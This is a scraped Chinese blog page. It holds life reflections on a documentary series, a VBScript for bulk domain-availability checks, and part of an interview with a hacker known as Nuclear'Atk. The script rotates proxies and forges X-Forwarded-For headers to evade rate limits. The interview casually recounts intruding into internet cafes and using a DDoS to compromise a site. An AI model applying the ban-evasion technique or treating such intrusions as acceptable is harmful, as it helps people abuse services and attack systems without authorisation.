2.过早结婚现在看来还是有很多弊端的，当一个人的价值观还未完全形成，且拥有的资本还不足以支撑一个家庭的时候，结婚固然是稳定了下来，但也同时成为了年轻人的一个羁绊，而有了小孩就必须花费更多的精力去抚养他们，在20几岁这个需要拼搏的年纪里，就更难平衡家庭和事业。/p p　　3.那些结婚的人基本都是找的是strong门当户对/strong阶级的人，这很正常，strong一个人在自己所属的阶级里有更广泛的人群交集和价值共鸣。/strong/p h3 id="十四关于工作"十四、关于工作/h3 p　　1.工作不仅在金钱上会给人保障以建立良好的物质基础，也能增加人的自我价值感。/p p　　2.工作就是在处理我与自己的关系。通过工作，能够养活自己和家人、能够培养自信、能够证明自我价值，如果在工作上无法做到以上几点，那就要像片中人那样甘于现状，从别处去找；如果现在的工作能够有所发展，就要积极去学习、提高，去增加自己挣钱技能，去寻找工作的价值和意义。/p p　　3.strong一个人要有一个贯穿一生的职业，否则只能换零工做苦力一辈子。/strong/p h3 id="十五关于人生"十五、关于人生/h3 p　　1.阅读人生，总让人唏嘘不已，很恐怖的是，人生的每一个七年，都会改变一个人，也有许多人不会被改变。/p p　　2.strong人生无非就三件事：多于少、苦与乐、生与死。/strong/p p　　3.在人生这场长跑中，你能够过得如何，跑得多远，应该是无数个XXX慢慢累积起来的，并非一蹴而就。/p p　　4.strong在既定已有的环境活出最好的自己才是成功。/strong/p p　　5.机会成本只有一件，就是时间。/p p　　6.strong天赋比你好固然可怕，更可怕的是天赋好的人比你还努力。/strong/p p　　7.《人生七年》和《浮生一日》给我们一个机会，让我们跳出自己的生活，以一个局外人的身份，看看我们身处的世界。/p p　　8.strong你看的越广，你选择就越广。你看的越高，你势必更容易攀上高峰。/strong/p p　　9.过往已经无法改变，趁年轻，去更多的地方，开拓自己的眼界。无需强求，尽力就好。/p p　　10.人生对待你的态度很大程度反应的是你对待人生的态度。/p p　　em案例：因为最近正好有位亲戚来北京找工作，跟他聊天的时候，发现他没有明确的目标。想找份稳定而又收入不错的工作，却发现没有一技之长，很被动。做生意，也没有经验。这样辗转反复，只能黯然离京。我在送他走的时候，说道，希望你能给自己设定个目标，然后朝着目标努力。不知道，他能否可以从这次进京的失败经历中悟到一些道理。/em/p p　　em体会：人生不管出身如何，emstrong个人对自己人生的清晰的目标至关重要/strong/em。有目标，按部就班，生活不会差到哪里去。/em/p h3 id="十六关于性格"十六、关于性格/h3 p　　除了母体的家庭环境，性格是重塑人生的最重要的一张牌。/p h3 id="十七关于规划"十七、关于规划/h3 p　　人生的规划很重要。strong什么样的年纪就应该做相应的事情/strong。好好读书的时候就好好读书，而不是过早的辍学去打工，过早结婚生子；该谈恋爱，结婚的时候就该认真的寻找自己的伴侣；/p h3 id="十八关于精神世界"十八、关于精神世界/h3 p　　培养自己的正能量，积极的自我暗示，学会感恩，乐于付出，做一些有社会价值的事情，充实自己的精神世界。/p h3 id="十九关于修养"十九、关于修养/h3 p　　1.注意你的想法，因为它能决定你的言辞。注意你的言辞，因为它能主导你的行为。注意你的行为，因为它能变成你的习惯。注意你的习惯，因为它能塑造你的性格。注意你的性格，因为它决定你的命运。/p p　　2.一个人无论成绩好坏与否，品行是关键！strong道德可以弥补能力的缺陷，而能力却难以掩盖道德的缺陷。/strong/p p　　3.要做一个认真的人，一个真诚的人。/p h3 id="二十关于经历"二十、关于经历/h3 p　　strong童年时期的经历会对人产生深厚的影响。/strong/p h3 id="二十一关于财富思维"二十一、关于财富（思维）/h3 p　　穷人的孩子普遍认为：钱够用就行，要能够维持生活。/p p　　富人的孩子普遍希望：不要迫于生计，要有足够的金钱，这样才能做自己喜欢做的事情。/p p　　所有的伟大都只源于，一个勇敢的开始，/p p　　strong穷人之所以是穷人，其中一个主要的原因就是他们只嫉妒富人的财富，却很少去思考富人是如何成为富人的。/strong/p h3 id="相关影片"相关影片/h3 p　　a href="https://movie.douban.com/subject/1292224/"《飞越疯人院》One Flew Over the Cuckoorsquo;s Nest (1975)/a/p p　　a href="https://movie.douban.com/subject/1292064/"《楚门的世界》The Truman Show (1998)/a/p p　　em据报道，受本片影响，一位名叫Sue Williams的女导演正在拍摄试图反映中国人生变化的纪录片Making It。该项目将于2020年结束。据说2008年奥运会之前该片已经播出一部分。不知能否看到，是什么角度。这一类跨越漫长时空的纪录片现在有个名称，叫“经度纪录片”longitudinal documentaries，也许真的如某些媒体所说，这种拍摄是对电影形式一种最高尚的运用。/em/p hr h2 id="关于人生规划"关于《人生规划》/h2 p　　25岁前，一定要完成哪些人生规划？/p p　　然而现实却是，大部分人 24 岁都刚刚大学毕业，对社会、对人生有个鸡毛认识、能规划个锤子……/p p　　底层穷人都在还生存的温饱线上挣扎，何谈规划？/p p　　阶级起跑线差距悬殊，寒门再难出贵子。（做电子货币、做黑产、做各类灰色收入一夜暴富的大佬当我没说……）/p h2 id="关于命运规划局"关于《命运规划局》/h2 p　　对命运的解答，对爱情的定义。/p p　　人生是一个容器，要达到“满足”的心理状态，并非只有一种途径，可以是爱情，事业，家庭，或者别的什么。/p p　　所谓的规划，不就是我们的人生理想。/p p　　而所谓的后果，不就是热血腾沸之后的归于平淡。/p p　　如果你知道自己的理想有实现的一天，你还会选择平淡么。充满激情的跌宕人生，果真是你真正想要的么。/p h2 id="关于结论关于很多"关于结论、关于很多/h2 p　　何谓规划？何谓人生？何谓生死？/p p　　strong人生没有对错，只有选择。/strong/p p　　strong人生没有标准答案，成功的标准不适合每一个人。/strong/p h2 id="相关影视"相关影视/h2 p　　a href="https://movie.douban.com/subject/2123439/"人生七年1 Seven Up! (1964)/a/p p　　a href="https://movie.douban.com/subject/2123440/"人生七年2 7 Plus Seven (1970)/a/p p　　a href="https://movie.douban.com/subject/2283680/"人生七年3 21 Up (1977)/a/p p　　a href="https://movie.douban.com/subject/1482936/"人生七年4 28 Up (1984)/a/p p　　a href="https://movie.douban.com/subject/1778460/"人生七年5 35 Up (1991)/a/p p　　a href="https://movie.douban.com/subject/1778459/"人生七年6 42 Up (1998)/a/p p　　a href="https://movie.douban.com/subject/1847588/"人生七年7 49 Up (2005)/a/p p　　a href="https://movie.douban.com/subject/10748226/"人生七年8 56 Up (2012)/a/p p　　a href="https://movie.douban.com/subject/30322776/"人生七年9 63 Up (2019)/a/p p　　人生七年10 70 Up (2026)，我们还能等得到么？/p p　　a href="https://movie.douban.com/subject/1292224/"《飞越疯人院》One Flew Over the Cuckoorsquo;s Nest (1975)/a/p p　　a href="https://movie.douban.com/subject/1292064/"《楚门的世界》The Truman Show (1998)/a/p p　　a href="https://movie.douban.com/subject/2300586/"《这个男人来自地球》The Man from Earth (2007)/a/p p　　a href="https://movie.douban.com/subject/3569943/"《命运规划局》The Adjustment Bureau (2011)/a/p p　　a href="https://movie.douban.com/subject/30219684/"《三和人才市场中国日结1500日元的年轻人们》(2018)/a/p

批量检查域名是否已注册（抢注域名神器）

Nuclear'Atk（核攻击）网络安全实验室

2015年12月17日 14:51

p style="text-indent:2em;" img title="批量检查域名是否已注册（抢注域名神器）" alt="批量检查域名是否已注册（抢注域名神器）" src="https://lcx.cc/file/old/4749_1.png" width="677" height="442" /nbsp; /p p style="text-indent:2em;" 前段时间写的一个小脚本，用来检查大量域名注册情况，源码如下： /p pre class="prettyprint lang-vb"Function echo(s) Wscript.Echo s End Function Public Function MidStr(s, a, b) '从指定字符串中截取两个字符串中间的字符:截取S中从A与B之间的字符串 Dim tmp IF InStr(s, a) gt; 0 And InStr(s, b) gt; 0 Then '判断特征字符是否存在 tmp = Mid(s, InStr(s, a) + Len(a)) '从s中截取所有a首次出现位置之后的字符 If InStr(tmp, b) gt; 0 Then '判断截取位置是否正确 tmp = Left(tmp, InStr(tmp, b) - 1) '在tmp中截取从开始到B首次出现位置之前的字符串 Else tmp = "" End IF End IF MidStr = tmp End Function Public Function FixStr(ByVal S) '删除字符串首尾空格、回车、换行 Do While Left(S, 1) = vbCr Or Left(S, 1) = vbLf Or Left(S, 1) = " " '删除字符串首：空格、回车、换行 S = Mid(S, 2) 'Echo Asc(Left(S, 1)) Loop Do While Right(S, 1) = vbCr Or Right(S, 1) = vbLf Or Right(S, 1) = " " '删除字符串尾：空格、回车、换行 S = Left(S, Len(S) - 1) 'Echo Asc(Right(S, 1)) Loop FixStr = S End Function Public Function GetRndItem(b) '从字符串数组中随机挑选一条 'Randomize 不能写在函数内部，会导致短时间间隔内相邻两次随机数一致，写在程序开始位置即可 GetRndItem = b(Int((UBound(b) - LBound(b) + 1) * Rnd + LBound(b))) '根据数组上、下标产生随机数，并获取该条数据 End Function Public Function RndNum(ByVal MinNum, ByVal MaxNum) '生成指定范围的随机数字（最小数，最大数）：MinNum lt;= 返回值 lt;= MaxNum 'Randomize 不能写在函数内部，会导致短时间间隔内相邻两次随机数一致，写在程序开始位置即可 RndNum = Int((MaxNum - MinNum + 1) * Rnd + MinNum) '生成随机数字 End Function function geturl(url) Dim WinHttp Set WinHttp = CreateObject("WinHttp.WinHttpRequest.5.1") WinHttp.Open "GET", url, False '--------- '读取http代理列表（配合代理之王，防止封IP） if fso.FileExists("proxy.txt") then dim p p = split(FixStr(fso.OpenTextfile("proxy.txt", 1, False).Readall), vbcrlf) WinHttp.SetProxy 2, GetRndItem(p) '设置http代理 end if '--------- Randomize WinHttp.SetRequestHeader "Connection", "Close" WinHttp.SetRequestHeader "User-Agent", Int((99999999 * Rnd) + 11111111) WinHttp.SetRequestHeader "X-Forwarded-For", Int((255 * Rnd) + 1) amp; "." amp; Int((255 * Rnd) + 1) amp; "." amp; Int((255 * Rnd) + 1) amp; "." amp; Int((255 * Rnd) + 1) '--------- WinHttp.Send 'geturl = "status = " amp; WinHttp.Status amp; ", size = " amp; len(WinHttp.ResponseText) 'geturl = Bytes2BSTR(WinHttp.ResponseBody) geturl = WinHttp.ResponseText end function public function check(s) dim html, tmp html = geturl("http://panda.www.net.cn/cgi-bin/check.cgi?area_domain=" amp; s) if instr(html, "|216|") gt; 0 or instr(html, "lt;originalgt;") = 0 then '|216|Query frequency is too high, please try again later check = html 'echo html 'wscript.quit else tmp = now amp; _ ", " amp; midstr(html, "lt;returncodegt;", "lt;/returncodegt;") amp; _ ", " amp; midstr(html, "lt;keygt;", "lt;/keygt;") amp; _ ", " amp; midstr(html, "lt;originalgt;", "lt;/originalgt;") check = tmp fso.OpenTextFile(f, 8, True).WriteLine tmp end if end function '--------------------------------------------------------------------------------------------------- echo "--------------------------------------------------" echo "批量检查域名是否已注册(抢注域名神器)" echo "" echo "by: Nuclear'Atk" echo "qq: 624118310(root@lcx.cc)" echo "blog: https://lcx.cc/" echo "usage:" echo " cscript check.vbs mode number_start number_end domain_length domain_type" echo "example:" echo " cscript /nologo check.vbs order 1111 2222 5 .com" echo " cscript /nologo check.vbs random 1111 2222 5 .com" echo "--------------------------------------------------" on error resume next Randomize dim fso set fso = CreateObject("Scripting.FileSystemObject") '获取参数 if WScript.Arguments.Count lt;gt; 5 then '参数不对则退出 echo "arguments count error!" wscript.quit else dim m, s, e, l, t, f m = WScript.Arguments(0) '生成模式（随机或顺序） s = WScript.Arguments(1) '起始数字 e = WScript.Arguments(2) '结束数字 l = WScript.Arguments(3) '域名长度 t = WScript.Arguments(4) '域名后缀 f = l amp; t amp; ".txt" '日志文件名 end if '批量生成域名并查询 dim x select case m case "order" '按顺序产生 dim i for i = s to e x = right(replace(space(l), " ", "0") amp; i, l) amp; t '组成域名 if instr(fso.OpenTextfile(f, 1, False).Readall, x) = 0 then '只查询没查过的域名（判断日志文件中是否存在该域名） echo check(x) else echo now amp; ", " amp; x amp; ", pass..." end if next echo now amp; ", done!" case "random" '随机产生 do x = right(replace(space(l), " ", "0") amp; RndNum(s, e), l) amp; t '组成域名 if instr(fso.OpenTextfile(f, 1, False).Readall, x) = 0 then '只查询没查过的域名（判断日志文件中是否存在该域名） echo check(x) else echo now amp; ", " amp; x amp; ", pass..." end if loop case else echo "mode error!" end select/pre p style="text-indent:2em;" 说明及用法： /p pre class="prettyprint"-------------------------------------------------- 批量检查域名是否已注册(抢注域名神器) by: Nuclear'Atk qq: 624118310(root@lcx.cc) blog: https://lcx.cc/ usage: cscript check.vbs mode number_start number_end domain_length domain_type example: cscript /nologo check.vbs order 1111 2222 5 .com cscript /nologo check.vbs random 1111 2222 5 .com --------------------------------------------------/pre p style="text-indent:2em;" 由于当时只用来抢注数字域名，所以只具备两个模式： /p p style="text-indent:2em;" 1、按顺序生成特定位数、后缀的数字域名，并且检查。 /p p style="text-indent:2em;" 2、随机生成特定位数、后缀范围内的数字域名，并且检查，适合在域名范围很大的情况下使用，例如检查7位数字域名，总量在百万以上，全部检查扫描一遍时间太久，则使用随机产生方式撞运气（会过滤掉已检查的重复域名），效率更快。 /p p style="text-indent:2em;" 稍微改改代码，就可以检查拼音域名，或其他特定字典生成域名，支持任何后缀！ /p p style="text-indent:2em;" 可以同时开启几十个进程协同工作（数量无上限），本人测试开启50进程同步扫描，峰值每秒扫描30-40个域名（5位数字com域名，一小时即可全部扫完！），使用 cmd 命令或者批处理即可实现，例子代码如下： /p pre class="prettyprint"echo off amp; color a amp; cls rem setlocal EnableDelayedExpansion rem for /l %%i in (0,500,9999) do @( rem set /a sum=%%i+499 rem echo cscript check.vbs order %%i !sum! 4 .cc rem start cscript check.vbs order %%i !sum! 4 .cc rem ) for /l %%i in (1,1,10) do @( start cscript check.vbs random 0 99999 5 .cc ) rem pause/pre p style="text-indent:2em;" 注意！如果同时开启多个进程协同工作，则需要配合“a href="https://lcx.cc/post/2844/" target="_blank"King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具/a”，用法很简单，使用代理之王验证完IP后，结果保存到同目录“proxy.txt”（默认文件名）即可自动调用，防止IP被封。 /p p style="text-indent:2em;" 使用的接口为万网接口：http://panda.www.net.cn/cgi-bin/check.cgi?area_domain=baidu.com /p p style="text-indent:2em;" 返回值及含义（每个域名后缀都不一样，自己测一下就知道了）: /p p style="text-indent:2em;" 210 : Domain name is available /p p style="text-indent:2em;" 211 : Domain name is not available /p p style="text-indent:2em;" 212 : Domain name is invalid /p p style="text-indent:2em;" 214 : Unknown error /p p style="text-indent:2em;" 其他功能及用法，交给各位自己发现吧！ /p pstrong留言评论（旧系统）：/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="8076,4583,180.165.47.88" p佚名 @ 2015-12-17 23:41:26/p p style="text-indent:2em"~/p p本站回复：/p p style="text-indent:2em"~/p /blockquote blockquote id="8078,4583,59.40.56.87" p佚名 @ 2015-12-18 12:18:44/p p style="text-indent:2em"赞/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8090,4583,27.29.82.107" p夜行者 @ 2015-12-22 20:14:28/p p style="text-indent:2em"赞一个。/p p本站回复：/p p style="text-indent:2em"感谢！/p /blockquote blockquote id="8147,4583,123.181.181.97" p佚名 @ 2016-02-12 11:22:55/p p style="text-indent:2em"本人用php写了一个万能的/p p本站回复：/p p style="text-indent:2em"恭喜恭喜/p /blockquote blockquote id="8234,4583,61.175.228.194" p佚名 @ 2016-04-22 20:18:51/p p style="text-indent:2em"666/p p本站回复：/p p style="text-indent:2em"666/p /blockquote blockquote id="8236,4583,218.205.56.220" pAny3ite @ 2016-04-25 14:21:56/p p style="text-indent:2em"我点了一下找答案，找到了答案地上有130块钱你看到了没。诶对了，第17行代码有一个错误的地方，反正我也不懂vbs我就瞎说了。/p p本站回复：/p p style="text-indent:2em"明明是 71 行好么，-_-!!!/p /blockquote /div

【原稿】专访知名民间黑客“核攻击”：在自己的道路上，谱写自己的传奇

Nuclear'Atk（核攻击）网络安全实验室

2015年12月16日 15:23

p style="text-indent:2em;" 最近一直比较忙，没多余时间更新、管理博客，今天抽时间记录一下…… /p p style="text-indent:2em;" 这篇采访稿出来有一段时间了，前几天 T00ls.Net、和 FreeBuf.COM 进行了发布： /p p style="text-indent:2em;" strongT00ls.Net：/strong /p p style="text-indent:2em;" 2015-12-10 15:11 官网文章：a href="https://www.t00ls.net/thread-32390-1-1.html" target="_blank"专访民间黑客核攻击：在自己的道路上，谱写自己的传奇【T00ls人物专访第四期】/a /p p style="text-indent:2em;" 2015-12-12 微信公众账号：a href="http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==mid=401065920idx=1sn=c5595701c477129d540995b0fca53e66scene=0#wechat_redirect" target="_blank"专访民间黑客核攻击：在自己的道路上，谱写自己的传奇/a /p p style="text-indent:2em;" strongFreeBuf.COM：/strong /p p style="text-indent:2em;" 2015-12-13 官网文章：a href="http://www.freebuf.com/news/89379.html" target="_blank"专访知名民间黑客“核攻击”：在自己的道路上，谱写自己的传奇/a /p p style="text-indent:2em;" 2015-12-13 微信公众账号：a href="http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==mid=401074280idx=4sn=e1b391f7a3f72ba98cd21e05667e6853scene=0#wechat_redirect" target="_blank"专访知名民间黑客“核攻击”：在自己的道路上，谱写自己的传奇/a /p p style="text-indent:2em;" 本文章由土司论坛（T00ls.Net）策划，T00ls 假说（js@t00ls.net）撰稿，在 T00ls、FreeBuf 都有发布，内容略有修改，以下为未修改原稿，留作记录。 /p hr / p align="center" a href="https://lcx.cc/file/old/4748_pic.jpg" target="_blank"img title="【原稿】专访知名民间黑客“核攻击”：在自己的道路上，谱写自己的传奇" alt="【原稿】专访知名民间黑客“核攻击”：在自己的道路上，谱写自己的传奇" src="https://lcx.cc/file/old/4748_pic.jpg" width="780" height="439" //a /p p style="text-indent:2em;" strong【自述】/strong /p p style="text-indent:2em;" 没有富二代的财富， /p p style="text-indent:2em;" 没有官二代的背景， /p p style="text-indent:2em;" 也没有军二代的后盾…… /p p style="text-indent:2em;" 我，核攻击，来自中国大西北一处普通的小山村，一个纯种屌丝~ /p p style="text-indent:2em;" 小时候的记忆已日渐模糊， /p p style="text-indent:2em;" 但依稀记得，那些年，那个家，还是全村著名的贫困户，以及每逢过年过节来讨债的大叔…… /p p style="text-indent:2em;" 不过，小时候学习还算争气，常年霸占年级前三，家里的土坯墙也因为贴满了各种奖状，显得金碧辉煌许多。 /p p style="text-indent:2em;" 上学追逐戏闹，放学下河捉蟹，晚上在大户人家里蹭黑白电视看动画片…… /p p style="text-indent:2em;" 时光匆匆，岁月如梭，一晃眼到了初中时代…… /p p style="text-indent:2em;" 不负众望，如愿考上了当时县里名牌中学。 /p p style="text-indent:2em;" 进了大县城，入了新学校，也在初一的微机课上第一次摸到了只在黑白电视中见过的计算机，头次知道还有电脑这种神奇的东西！ /p p style="text-indent:2em;" 从此对它产生了浓厚的兴趣，闲暇时间翻阅各种教科书，逐行逐字看的如痴如醉。 /p p style="text-indent:2em;" 课桌上的初中《信息技术》已快被翻烂，里边写满了各种笔记以及自己的心得体会，还在空白处手算二进制、八进制、十进制、十六进制，估计全校就我一个这么干吧，其他人都撕了折飞机…… /p p style="text-indent:2em;" 那时，每周最期待的事情就是上微机课，每次遇到新的问题、知识，就等着在下周的微机课上实践，当时一周只有一节课，有时还被其他老师占了…… /p p style="text-indent:2em;" 后来，应该是在初二吧，在 Word 97 中用 Visual Basic 语言写了人生中的第一个“hello, world”程序，当它成功运行时，兴奋了好几天！ /p p style="text-indent:2em;" 再后来，渐渐地有了十块八块的零花钱，有次在报刊亭看新出的故事会，偶然间瞅到了一本关于黑客的杂志，当时还不知道黑客是什么，只是看到封面和计算机知识有关，一咬牙，拿一周的零食换了这本杂志回来！！！ /p p style="text-indent:2em;" 然后放学火速奔回家，一头扎进去，一直看到半夜才看完，知识第一次被颠覆，原来计算机世界这么大！！！ /p p style="text-indent:2em;" 从此一发不可收拾，什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买，当时只有一个报刊亭卖，每次还只有两三本，去迟了就没了！ /p p style="text-indent:2em;" 然后白天就在学校偷偷翻杂志，把一些重要的知识点写在笔记本上，死记硬背书里的 cmd 命令，放学、放假去网吧实践…… /p p style="text-indent:2em;" 每周的书刊都翻了又翻，里边做满了笔记，翻完杂志又去逛杂志官网论坛，自己没有电脑读取附带的光盘内容，就去下载别人发布的光盘镜像，玩那些软件玩的不亦乐乎，书籍一直保留到现在也没舍得卖。 /p p style="text-indent:2em;" 一直买了一两年，直到后来觉得书里的内容太菜了，就再也没买了，后来互联网媒体时代到来，对传统纸质媒体产生冲击，这些书刊有些只出电子版了，大部分直接绝刊倒闭了！ /p p style="text-indent:2em;" 这些书刊对当时的我影响很大，知识在一两年之中突飞猛进，渐渐地在当地小有名气，还收了好几个徒弟，入侵过本地几乎所有网吧，然后这些网吧老板、网管都认得我了，去上网都跟防贼似的看着，当然，也有些最后混成了朋友…… /p p style="text-indent:2em;" 岁月匆匆，一晃眼，已步入了高二的学堂…… /p p style="text-indent:2em;" 这一年，发生了许多事，家里的变故，再加上也没有钱继续交学费，于是就彻底告别了学生生涯，十几岁的我匆匆步入社会，开始赚钱养家…… /p p style="text-indent:2em;" 没有任何社会经验，也没有任何工作能力，一个十几岁的未成年穷屌丝学生能干啥？ /p p style="text-indent:2em;" 最初的几个月都在网吧包夜度过，做着黑产大牛一夜暴富的梦，混时度日，对未来一片渺茫…… /p p style="text-indent:2em;" 数月后，在别人的介绍下，在某网吧开始当网管，一个月工资只有五百多，很低很低，只够吃饱饭，但是每天可以长时间免费上网，这令我很开心，毕竟当时网费还是很贵的…… /p p style="text-indent:2em;" 于是，在这个嘈杂、肮脏、混乱不堪的环境中，度过了我人生中很重要的一段学习时光…… /p p style="text-indent:2em;" 以前对硬件一窍不通，现在天天修机维护，造就了我对硬件的精通，各种疑难杂症手到病除，积累了丰富的底层硬件知识。 /p p style="text-indent:2em;" 这是我黑客生涯最活跃、最巅峰的一段时间，白天端茶泡面、搽桌扫地、修机维护，见识社会各色人等，晚上通宵奋战，横行于各大黑客论坛之中…… /p p style="text-indent:2em;" 也就是在这时结识了蹒跚学步的 t00ls、吾爱破解、看雪、绿色兵团，以及各类杂七杂八的技术论坛，什么黑客动画吧、黑客基地、黑鹰、Dir溢出的红客联盟，只要是个黑客技术网站，就都有我的足迹，甚至还开了个网站叫“巅峰黑客”（现在看起来，真他丫的SB！-_-!!!）！ /p p style="text-indent:2em;" 凭着过硬的技术、雄厚的实力，在 oldjun（老君）的邀请下，混进了 t00ls 核心圈子，还当上了版主，后来因为年轻气盛和某核心成员吵架，又被赶出核心圈，至今保留一个荣誉会员称号…… /p p style="text-indent:2em;" 那个时期，编写、发布过很多软件，可能有人还记得在 t00ls 发布的“全球首款B/S构架远控 Network Rat v8.0”，没错，那个是在网吧连续通宵三五天写出来的！但现在看起来，就像是个玩具…… /p p style="text-indent:2em;" 在网吧的学习生涯，每天都像打了鸡血，知识面涉猎之广，连现在的我都感到恐怖，同时也赋予了我极其丰富的各类知识。 /p p style="text-indent:2em;" 就这样，没日没夜丧心病狂的活着…… /p p style="text-indent:2em;" 时间一晃，一半年过去了，随着在黑客圈知名度的增加，以及技术实力的增强，手里也渐渐地攒了一些钱，终于凑够钱买了人生第一台电脑！某款杂牌机！！！ /p p style="text-indent:2em;" 之后就很少去网吧了，而是蜷缩在县城某个城中村出租屋的黑暗小角落里，用着自己新买的电脑潜心研究，脱去浮躁，慢慢向真正的技术大牛进化，足不出户，不知世上是何年…… /p p style="text-indent:2em;" 花开花落，果生果熟，叶出叶红，叶凋雪落，又一年过去了…… /p p style="text-indent:2em;" 在这期间丰富了更多新的知识，建立了个人小站：a href="https://lcx.cc/" target="_blank"https://lcx.cc//a，一直运行到现在，同时也见证了乌云的崛起。 /p p style="text-indent:2em;" 后来，机缘巧合，认识了一些公司老总，在贵人大力邀请之下，告别蜷缩了几载的小小出租屋，正式进入搬砖生涯…… /p p style="text-indent:2em;" 再后来，这些年，一直走南闯北，手里也渐渐的有了些积蓄，生活也更舒适一点了…… /p p style="text-indent:2em;" 然后，然后就没有了…… /p p style="text-indent:2em;" （完） /p p style="text-indent:2em;" （注：以上内容纯属虚构，如有雷同，绝无可能！） /p p style="text-indent:2em;" ---------- /p p style="text-indent:2em;" 写在最后： /p p style="text-indent:2em;" 正是因为对自己变态的要求，才造就了自己的现在，做！就要做第一！ /p p style="text-indent:2em;" 我们现在还很年轻，人生的轨迹，也才刚刚开始。 /p p style="text-indent:2em;" 这个世界，从来就没有什么公正、平等！ /p p style="text-indent:2em;" 既然没有含着金汤勺出生，就更要付出常人千倍、万倍的努力！ /p p style="text-indent:2em;" 在自己的道路上，谱写自己的传奇！ /p hr / p strong【1】自己的故事：/strong /p p style="text-indent:2em;" 1.基本信息，做过那些牛掰的事儿？感觉最有成就感的一件事是什么？ /p p style="text-indent:2em;" 牛掰的事情嘛，干过挺多的（lcx.cc 上有很多相关文章），最有成就感嘛，那当然是创立 a href="https://lcx.cc/" target="_blank"https://lcx.cc//a 。 /p p style="text-indent:2em;" 2.网名是怎么来的？核总这头像啥意识？用了这么多年，有什么寓意？ /p p style="text-indent:2em;" 其实我最早网名不叫“Nuclear'Atk（核攻击）”，而是“Hacker'Rose”，后来和 t00ls 核心吵架，那个号封了，然后新注册了一个，想着起个牛逼独特的网名，正巧看到百度新闻“…核攻击…”，就用了…… /p p style="text-indent:2em;" 后来也没改过，就用了这么多年，至于寓意，在博客也说过（a href="https://lcx.cc/post/1/" target="_blank"https://lcx.cc/post/1//a），其实很简单，引用原文： /p p style="text-indent:2em;" ********** /p p style="text-indent:2em;" 英文：Nuclear'Atk /p p style="text-indent:2em;" 中文：核攻击 /p p style="text-indent:2em;" 英文网名拆开的意思是： /p p style="text-indent:2em;" Nuclear：英语单词，1. 核,核子,核能，2. 核心的,中心的，3. 原子核的,原子能的,原子弹的。 /p p style="text-indent:2em;" '：半角单引号，用来判断注入的经典符号，这里用来做连接符、分割符。 /p p style="text-indent:2em;" Atk：英语单词 Attack 的缩写，意思为：1. 进攻,袭击，2. 攻击,打击,攻,攻打，3. 抨击,责难 /p p style="text-indent:2em;" 有时当某些网站禁止使用单引号的时候，还用过：NuclearAtk、Nuclear-Atk、Nuclear_Atk 等昵称。 /p p style="text-indent:2em;" 2010 年以前用的网名为：HackerRose，带“er”的，不是“HackRose”。 /p p style="text-indent:2em;" ********** /p p style="text-indent:2em;" 头像取自十几年前的一部电影《地心毁灭》，电影末尾老鼠黑客(Rat)开发的一款软件中的logo，截图提取出来，再配上电影《黑客帝国3》的壁纸作为背景，就成了现在的头像。 /p p style="text-indent:2em;" 有眼尖的朋友发现，头像中有两个单词“Network”、“Rat”，后来也被我作为一款远控的名字了（见自述）。 /p p style="text-indent:2em;" 黑客帝国3 影视壁纸，下载地址：a href="https://lcx.cc/file/old/1762_黑客帝国3 影视壁纸.jpg" target="_blank"https://lcx.cc/file/old/1762_黑客帝国3 影视壁纸.jpg/a /p p style="text-indent:2em;" 3.何时开始学习的黑客技术，因为什么喜欢上了黑客？ /p p style="text-indent:2em;" 嗯，在自述里详细讲了，初中。 /p p style="text-indent:2em;" 4.在学的过程中遇到过那些有趣，兴奋，激动的故事，有那些比较印象深刻的事情？ /p p style="text-indent:2em;" 嗯，这个在自述里有详细说。 /p p style="text-indent:2em;" 5.最开始学习技术的时候是通过什么样的方法学习的？现在呢？ /p p style="text-indent:2em;" 嗯，这个在自述里有详细说。 /p p style="text-indent:2em;" 6.渗透最久的站用了用了多长时间，最后怎么搞定的？ /p p style="text-indent:2em;" 最久的，断断续续几个月吧，最后 DDOS 迫使其更换服务器，然后你懂得…… /p p style="text-indent:2em;" 7.当你感觉到瓶颈的时候你是怎么做的？ /p p style="text-indent:2em;" 换个思路，绕出来，再从另一入口进，山穷水尽疑无路，柳暗花明又一村~ /p p style="text-indent:2em;" 8.在那些论坛组织学习过？写过那些黑客工具？ /p p style="text-indent:2em;" 噢噢，这个太多了，自述里详细写过一部分，工具嘛，更多了，具体参考 a href="https://lcx.cc/"https://lcx.cc//a。 /p p style="text-indent:2em;" 9.在没发家致富的时候是怎么平衡现实需求和技术追求的？是否有时间不够用的情况？ /p p style="text-indent:2em;" 参考自述内容…… /p p style="text-indent:2em;" 10.家长对你学习黑客技术持有什么样的态度？亲朋好友之间有学习黑客技术的吗？ /p p style="text-indent:2em;" 因为对这个并不懂，但作为一门技术来说，持支持态度。 /p p style="text-indent:2em;" 部分好友有学习。 /p p style="text-indent:2em;" 11.还有什么其他的兴趣爱好吗？业余时间做什么？在黑客领域之外，还关注那些领域的知识？ /p p style="text-indent:2em;" 兴趣爱好很多，音乐、游戏、电影、摄影、写作等……关注的领域也很多，主要是科技之类的。 /p p style="text-indent:2em;" 12.谈谈大家很关心的避免水表的经验，如何保护自己？ /p p style="text-indent:2em;" 这个问题面太广，完全可以独立写一本书，简单的说的话，把真实身份和虚拟身份隔离使用。 /p p style="text-indent:2em;" 更多保护自己的知识可以参考：a href="https://lcx.cc/" target="_blank"https://lcx.cc//a /p p strong【2】核攻击的生存现状/strong /p p style="text-indent:2em;" 1.核总现在结婚了吗？孩子几岁了？爱人是做什么的呢？ /p p style="text-indent:2em;" 结婚嘛，现在太年轻，太早！女友嘛，这是个奢侈品，不敢拥有~ /p p style="text-indent:2em;" 2.觉得做WEB的10后挣钱方向是啥？ /p p style="text-indent:2em;" 这个不敢妄下评论，我感觉应该是移动端吧。 /p p style="text-indent:2em;" 3.现在的状况是什么样的？未来的打算是什么样的？ /p p style="text-indent:2em;" 现在状况么？在某食品行业搬砖！ /p p style="text-indent:2em;" 未来打算么？谱写自己的传奇！-_-!!! /p p style="text-indent:2em;" 4.核总技术做了多久？现在做的是技术还是管理？ /p p style="text-indent:2em;" 网络安全经验，大概有十年了。 /p p style="text-indent:2em;" 现在技术管理都做，以后可能转型为管理吧。 /p p strong【3】对当前网络、信息安全的看法/strong /p p style="text-indent:2em;" 1.网络安全事故频发，你如何看？ /p p style="text-indent:2em;" 